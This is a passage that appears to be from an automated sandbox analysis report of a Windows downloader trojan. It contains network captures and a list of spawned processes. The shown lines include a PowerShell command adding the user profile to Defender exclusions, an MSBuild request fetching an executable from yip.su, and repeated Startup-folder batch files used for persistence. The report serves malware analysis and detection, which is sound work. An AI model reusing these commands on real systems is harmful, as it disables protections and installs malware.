69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:24:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	49802	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:24:11 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:24:11 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:24:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:24:11 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:24:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGDXipmZrgt83wU5NY1Fp4BoDQ0YvbpOYJN26yr28EDIbu4b2XSYcDm%2BPmdolqRFAE1Y8t1YSkGgbilB%2FcXVCusKU7Knn3ND9zcmqX9KnWJvKlpgraz3cAU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433c3c1ab87291-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:24:11 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:24:11 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:24:11 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:24:11 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
2024-09-16 19:24:11 UTC	1369	IN	Data Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
2024-09-16 19:24:11 UTC	1369	IN	Data Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
2024-09-16 19:24:11 UTC	154	IN	Data Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:24:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:20:05
Start date:	16/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe"
Imagebase:	0x7ff67dcb0000
File size:	2'274'400 bytes
MD5 hash:	EC3AFDBD761916A682E9372834365939
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:20:05
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:20:06
Start date:	16/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:20:06
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:20:06
Start date:	16/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:20:07
Start date:	16/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Imagebase:
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:20:07
Start date:	16/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Imagebase:	0xb30000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:20:08
Start date:	16/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:20:11
Start date:	16/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:20:19
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:20:19
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:20:32
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:20:32
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:20:40
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:20:40
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:20:53
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:20:54
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:21:02
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:21:02
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:21:21
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4KsgxmPNACDuZ2zjqQjtltvX.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:21:21
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:21:35
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3njSfWDGOVl28Hs8hyJ6Y7LT.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:21:35
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:21:43
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:21:43
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:21:56
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9O41Qow2bZeAiNaUuBCU9sI8.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:21:56
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:22:04
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FLz6tWFKVQbppt2Sn3SWxNu4.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:22:04
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:22:13
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8NYZUwJycflpNiJIlSTOBho.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	15:22:13
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:22:26
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aPLL8m8adxhtzUUH2fMBYP78.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:22:26
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:22:35
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdci9HHJSUc0QT0L7qkU4ePj.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:22:35
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:22:43
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nGizfduNOl4JVOkYHOr4NIAN.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
